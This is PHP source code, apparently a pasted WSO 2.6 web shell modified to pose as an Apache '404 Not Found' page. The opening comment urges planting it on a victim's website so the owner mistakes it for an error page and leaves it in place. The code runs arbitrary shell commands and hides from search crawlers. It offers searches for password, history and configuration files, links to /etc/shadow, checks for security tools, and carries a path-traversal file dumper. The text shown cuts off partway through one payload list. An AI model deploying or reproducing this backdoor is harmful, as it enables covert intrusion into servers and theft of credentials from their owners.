· 5 years ago · Feb 02, 2020, 06:54 AM
1<?php
2/*
3This is a private WSO Shell modification which has a "404 Not Found" page as it's login page. (To find the password input you can just open the shell location in your browser and hit the "tabulator" key (The arrow next to your caps key)). This is very useful when you want to hide the shell from the website owner!
4You can even put it into the default homepage directory and call it "404.php" the website owner will open it in his browser, see a 404 code and think that it's just his default 404 not found page so he won't delete it!
5But I still recommend you to hide it somewhere in his website.
6*/
7$auth_pass = "4f4adcbf8c6f66dcfc8a3282ac2bf10a"; //Default password is 404 . You can use http://md5online.org/md5-encrypt.html to get the md5 of the password you wish the shell to have!
8$color = "#00ff00"; //Default color is green. You can use http://www.somacon.com/p142.php to get the colorcode of the color you wish the shell interface to have!
9$default_action = 'FilesMan';
10$default_use_ajax = true;
11$default_charset = 'Windows-1251';
12
13if(!empty($_SERVER['HTTP_USER_AGENT'])) {
14 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
15 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
16 header('HTTP/1.0 404 Not Found');
17 exit;
18 }
19}
20
21@session_start();
22@ini_set('error_log',NULL);
23@ini_set('log_errors',0);
24@ini_set('max_execution_time',0);
25@set_time_limit(0);
26@set_magic_quotes_runtime(0);
27@define('WSO_VERSION', '2.6');
28
29if(get_magic_quotes_gpc()) {
30 function WSOstripslashes($array) {
31 return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
32 }
33 $_POST = WSOstripslashes($_POST);
34}
35
36function wsoLogin() {
37 die("<h1>Not Found</h1>
38<p>The requested URL was not found on this server.</p>
39<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
40<hr>
41<address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80</address>
42 <style>
43 input { margin:0;background-color:#fff;border:1px solid #fff; }
44 </style>
45 <pre align=center>
46 <form method=post>
47 <input type=password name=pass>
48 </form></pre>");
49}
50if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
51 if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
52 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
53 else
54 wsoLogin();
55
56if(strtolower(substr(PHP_OS,0,3)) == "win")
57 $os = 'win';
58else
59 $os = 'nix';
60
61$safe_mode = @ini_get('safe_mode');
62if(!$safe_mode)
63 error_reporting(0);
64
65$disable_functions = @ini_get('disable_functions');
66$home_cwd = @getcwd();
67if(isset($_POST['c']))
68 @chdir($_POST['c']);
69$cwd = @getcwd();
70if($os == 'win') {
71 $home_cwd = str_replace("\\", "/", $home_cwd);
72 $cwd = str_replace("\\", "/", $cwd);
73}
74if( $cwd[strlen($cwd)-1] != '/' )
75 $cwd .= '/';
76
77if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax']))
78 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax'];
79
80if($os == 'win')
81 $aliases = array(
82 "List Directory" => "dir",
83 "Find index.php in current dir" => "dir /s /w /b index.php",
84 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
85 "Show active connections" => "netstat -an",
86 "Show running services" => "net start",
87 "User accounts" => "net user",
88 "Show computers" => "net view",
89 "ARP Table" => "arp -a",
90 "IP Configuration" => "ipconfig /all"
91 );
92else
93 $aliases = array(
94 "List dir" => "ls -lha",
95 "list file attributes on a Linux second extended file system" => "lsattr -va",
96 "show opened ports" => "netstat -an | grep -i listen",
97 "process status" => "ps aux",
98 "Find" => "",
99 "find all suid files" => "find / -type f -perm -04000 -ls",
100 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
101 "find all sgid files" => "find / -type f -perm -02000 -ls",
102 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
103 "find config.inc.php files" => "find / -type f -name config.inc.php",
104 "find config* files" => "find / -type f -name \"config*\"",
105 "find config* files in current dir" => "find . -type f -name \"config*\"",
106 "find all writable folders and files" => "find / -perm -2 -ls",
107 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
108 "find all service.pwd files" => "find / -type f -name service.pwd",
109 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
110 "find all .htpasswd files" => "find / -type f -name .htpasswd",
111 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
112 "find all .bash_history files" => "find / -type f -name .bash_history",
113 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
114 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
115 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
116 "Locate" => "",
117 "locate httpd.conf files" => "locate httpd.conf",
118 "locate vhosts.conf files" => "locate vhosts.conf",
119 "locate proftpd.conf files" => "locate proftpd.conf",
120 "locate psybnc.conf files" => "locate psybnc.conf",
121 "locate my.conf files" => "locate my.conf",
122 "locate admin.php files" =>"locate admin.php",
123 "locate cfg.php files" => "locate cfg.php",
124 "locate conf.php files" => "locate conf.php",
125 "locate config.dat files" => "locate config.dat",
126 "locate config.php files" => "locate config.php",
127 "locate config.inc files" => "locate config.inc",
128 "locate config.inc.php" => "locate config.inc.php",
129 "locate config.default.php files" => "locate config.default.php",
130 "locate config* files " => "locate config",
131 "locate .conf files"=>"locate '.conf'",
132 "locate .pwd files" => "locate '.pwd'",
133 "locate .sql files" => "locate '.sql'",
134 "locate .htpasswd files" => "locate '.htpasswd'",
135 "locate .bash_history files" => "locate '.bash_history'",
136 "locate .mysql_history files" => "locate '.mysql_history'",
137 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
138 "locate backup files" => "locate backup",
139 "locate dump files" => "locate dump",
140 "locate priv files" => "locate priv"
141 );
142
143function wsoHeader() {
144 if(empty($_POST['charset']))
145 $_POST['charset'] = $GLOBALS['default_charset'];
146 global $color;
147 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
148<style>
149body {background-color:#000;color:#fff;}
150body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
151span,h1,a{ color: $color !important; }
152span{ font-weight: bolder; }
153h1{ border:1px solid $color;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
154div.content{ padding: 5px;margin-left:5px;}
155a{ text-decoration:none; }
156a:hover{ background:#ff0000; }
157.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
158.bigarea{ width:100%;height:250px; }
159input, textarea, select{ margin:0;color:#00ff00;background-color:#000;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
160form{ margin:0px; }
161#toolsTbl{ text-align:center; }
162.toolsInp{ width: 80%; }
163.main th{text-align:left;}
164.main tr:hover{background-color:#5e5e5e;}
165.main td, th{vertical-align:middle;}
166pre{font-family:Courier,Monospace;}
167#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
168</style>
169<script>
170 var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
171 var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
172 var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
173 var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
174 var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
175 var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
176 var d = document;
177 function set(a,c,p1,p2,p3,charset) {
178 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
179 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
180 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
181 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
182 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
183 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
184 }
185 function g(a,c,p1,p2,p3,charset) {
186 set(a,c,p1,p2,p3,charset);
187 d.mf.submit();
188 }
189 function a(a,c,p1,p2,p3,charset) {
190 set(a,c,p1,p2,p3,charset);
191 var params = 'ajax=true';
192 for(i=0;i<d.mf.elements.length;i++)
193 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
194 sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
195 }
196 function sr(url, params) {
197 if (window.XMLHttpRequest)
198 req = new XMLHttpRequest();
199 else if (window.ActiveXObject)
200 req = new ActiveXObject('Microsoft.XMLHTTP');
201 if (req) {
202 req.onreadystatechange = processReqChange;
203 req.open('POST', url, true);
204 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
205 req.send(params);
206 }
207 }
208 function processReqChange() {
209 if( (req.readyState == 4) )
210 if(req.status == 200) {
211 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
212 var arr=reg.exec(req.responseText);
213 eval(arr[2].substr(0, arr[1]));
214 } else alert('Request error!');
215 }
216</script>
217<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'>
218<form method=post name=mf style='display:none;'>
219<input type=hidden name=a>
220<input type=hidden name=c>
221<input type=hidden name=p1>
222<input type=hidden name=p2>
223
224<input type=hidden name=p3>
225<input type=hidden name=charset>
226</form>";
227 $freeSpace = @diskfreespace($GLOBALS['cwd']);
228 $totalSpace = @disk_total_space($GLOBALS['cwd']);
229 $totalSpace = $totalSpace?$totalSpace:1;
230 $release = @php_uname('r');
231 $kernel = @php_uname('s');
232 if(!function_exists('posix_getegid')) {
233 $user = @get_current_user();
234 $uid = @getmyuid();
235 $gid = @getmygid();
236 $group = "?";
237 } else {
238 $uid = @posix_getpwuid(posix_geteuid());
239 $gid = @posix_getgrgid(posix_getegid());
240 $user = $uid['name'];
241 $uid = $uid['uid'];
242 $group = $gid['name'];
243 $gid = $gid['gid'];
244 }
245
246 $cwd_links = '';
247 $path = explode("/", $GLOBALS['cwd']);
248 $n=count($path);
249 for($i=0; $i<$n-1; $i++) {
250 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
251 for($j=0; $j<=$i; $j++)
252 $cwd_links .= $path[$j].'/';
253 $cwd_links .= "\")'>".$path[$i]."/</a>";
254 }
255
256 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
257 $opt_charsets = '';
258 foreach($charsets as $item)
259 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
260
261 $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network');
262 if(!empty($GLOBALS['auth_pass']))
263 $m['Logout'] = 'Logout';
264 $m['Self remove'] = 'SelfRemove';
265 $menu = '';
266 foreach($m as $k => $v)
267 $menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>';
268
269 $drives = "";
270 if($GLOBALS['os'] == 'win') {
271 foreach(range('c','z') as $drive)
272 if(is_dir($drive.':\\'))
273 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
274 }
275 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
276 . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
277 . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
278 . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
279 . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
280}
281
282function wsoFooter() {
283 $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
284 echo "
285
286</div>
287<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
288 <tr>
289 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
290 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
291 </tr><tr>
292 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
293 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
294
295 </tr><tr>
296 <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
297 <td><form method='post' ENCTYPE='multipart/form-data'>
298 <input type=hidden name=a value='FilesMAn'>
299 <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
300 <input type=hidden name=p1 value='uploadFile'>
301 <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
302 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
303
304 </tr></table></div></body></html>";
305}
306
307if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
308 function posix_getpwuid($p) {return false;} }
309if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
310 function posix_getgrgid($p) {return false;} }
311
312function wsoEx($in) {
313 $out = '';
314 if (function_exists('exec')) {
315 @exec($in,$out);
316 $out = @join("\n",$out);
317 } elseif (function_exists('passthru')) {
318 ob_start();
319 @passthru($in);
320 $out = ob_get_clean();
321 } elseif (function_exists('system')) {
322 ob_start();
323 @system($in);
324 $out = ob_get_clean();
325 } elseif (function_exists('shell_exec')) {
326 $out = shell_exec($in);
327 } elseif (is_resource($f = @popen($in,"r"))) {
328 $out = "";
329 while(!@feof($f))
330 $out .= fread($f,1024);
331 pclose($f);
332 }
333 return $out;
334}
335function wsoViewSize($s) {
336 if($s >= 1073741824)
337 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
338 elseif($s >= 1048576)
339 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
340 elseif($s >= 1024)
341 return sprintf('%1.2f', $s / 1024 ) . ' KB';
342 else
343 return $s . ' B';
344}
345
346function wsoPerms($p) {
347 if (($p & 0xC000) == 0xC000)$i = 's';
348 elseif (($p & 0xA000) == 0xA000)$i = 'l';
349 elseif (($p & 0x8000) == 0x8000)$i = '-';
350 elseif (($p & 0x6000) == 0x6000)$i = 'b';
351 elseif (($p & 0x4000) == 0x4000)$i = 'd';
352 elseif (($p & 0x2000) == 0x2000)$i = 'c';
353 elseif (($p & 0x1000) == 0x1000)$i = 'p';
354 else $i = 'u';
355 $i .= (($p & 0x0100) ? 'r' : '-');
356 $i .= (($p & 0x0080) ? 'w' : '-');
357 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
358 $i .= (($p & 0x0020) ? 'r' : '-');
359 $i .= (($p & 0x0010) ? 'w' : '-');
360 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
361 $i .= (($p & 0x0004) ? 'r' : '-');
362 $i .= (($p & 0x0002) ? 'w' : '-');
363 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
364 return $i;
365}
366
367function wsoPermsColor($f) {
368 if (!@is_readable($f))
369 return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
370 elseif (!@is_writable($f))
371 return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
372 else
373 return '<font color=#00BB00>' . wsoPerms(@fileperms($f)) . '</font>';
374}
375
376if(!function_exists("scandir")) {
377 function scandir($dir) {
378 $dh = opendir($dir);
379 while (false !== ($filename = readdir($dh)))
380 $files[] = $filename;
381 return $files;
382 }
383}
384
385function wsoWhich($p) {
386 $path = wsoEx('which ' . $p);
387 if(!empty($path))
388 return $path;
389 return false;
390}
391
392function actionSecInfo() {
393 wsoHeader();
394 echo '<h1>Server security information</h1><div class=content>';
395 function wsoSecParam($n, $v) {
396 $v = trim($v);
397 if($v) {
398 echo '<span>' . $n . ': </span>';
399 if(strpos($v, "\n") === false)
400 echo $v . '<br>';
401 else
402 echo '<pre class=ml1>' . $v . '</pre>';
403 }
404 }
405 wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
406 if(function_exists('apache_get_modules'))
407 wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
408 wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
409 wsoSecParam('Open base dir', @ini_get('open_basedir'));
410 wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
411 wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
412 wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
413 $temp=array();
414 if(function_exists('mysql_get_client_info'))
415 $temp[] = "MySql (".mysql_get_client_info().")";
416 if(function_exists('mssql_connect'))
417 $temp[] = "MSSQL";
418 if(function_exists('pg_connect'))
419 $temp[] = "PostgreSQL";
420 if(function_exists('oci_connect'))
421 $temp[] = "Oracle";
422 wsoSecParam('Supported databases', implode(', ', $temp));
423 echo '<br>';
424
425 if($GLOBALS['os'] == 'nix') {
426 wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
427 wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
428 wsoSecParam('OS version', @file_get_contents('/proc/version'));
429 wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
430 if(!$GLOBALS['safe_mode']) {
431 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
432 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
433 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
434 echo '<br>';
435 $temp=array();
436 foreach ($userful as $item)
437 if(wsoWhich($item))
438 $temp[] = $item;
439 wsoSecParam('Userful', implode(', ',$temp));
440 $temp=array();
441 foreach ($danger as $item)
442 if(wsoWhich($item))
443 $temp[] = $item;
444 wsoSecParam('Danger', implode(', ',$temp));
445 $temp=array();
446 foreach ($downloaders as $item)
447 if(wsoWhich($item))
448 $temp[] = $item;
449 wsoSecParam('Downloaders', implode(', ',$temp));
450 echo '<br/>';
451 wsoSecParam('HDD space', wsoEx('df -h'));
452 wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
453 }
454 } else {
455 wsoSecParam('OS Version',wsoEx('ver'));
456 wsoSecParam('Account Settings',wsoEx('net accounts'));
457 wsoSecParam('User Accounts',wsoEx('net user'));
458 }
459 echo '</div>';
460 wsoFooter();
461}
462function actionlfiscan() {
463 wsoHeader();
464 print '
465 <h3>Led-Zeppelin\'s LFI File dumper</h3>
466
467 <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
468 LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
469 <option value="1">
470 Access Log
471 </option>
472
473 <option value="2">
474 httpd.conf
475 </option>
476
477 <option value="3">
478 Error Log
479 </option>
480 <option value="4">
481 php.ini
482 </option>
483 <option value="5">
484 MySQL
485 </option>
486 <option value="6">
487 FTP
488 </option>
489 <option value="7">
490 Environ
491 </option>
492 </select> Null: <select name="null">
493 <option value="%00">
494 Yes
495 </option>
496
497 <option value="">
498 No
499 </option>
500 </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
501 </form>';
502 error_reporting(0);
503 if($_POST['lfiurl']) {
504 print "<pre>";
505 $cheader = $_POST['custom_header'];
506 $target = $_POST['lfiurl'];
507 $type = $_POST['scantype'];
508 $byte1 = $_POST['null'];
509 $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
510 $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
511 $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
512 $lfiaccess = array(
513 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
514 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
515 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
516 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
517 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
518 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
519 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
520 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
521 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
522 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
523 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
524 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
525 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
526 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
527 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
528 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
529 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
530 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
531 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
532 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
533 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
534 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
535 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
536
537 $lfierror = array(
538 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
539 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
540 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
541 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
542 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
543 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
544 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
545 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
546 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
547 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
548 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
549 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
550 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
551 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
552 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
553 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
554 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
555 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
556 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
557 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
558 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
559 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
560 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
561 $lficonfig = array(
562 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
563 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
564 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
565 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
566 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
567 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
568 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
569 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
570 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
571 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
572 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
573 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
574 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
575 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
576 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
577 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
578 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
579 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
580 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
581 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
582 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
583 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
584 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
585 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
586 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
587 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
588 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
589 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
590 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
591 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
592 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
593 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
594 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
595 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
596 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
597
598 $lfiphpini = array(
599 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
600 2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
601 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
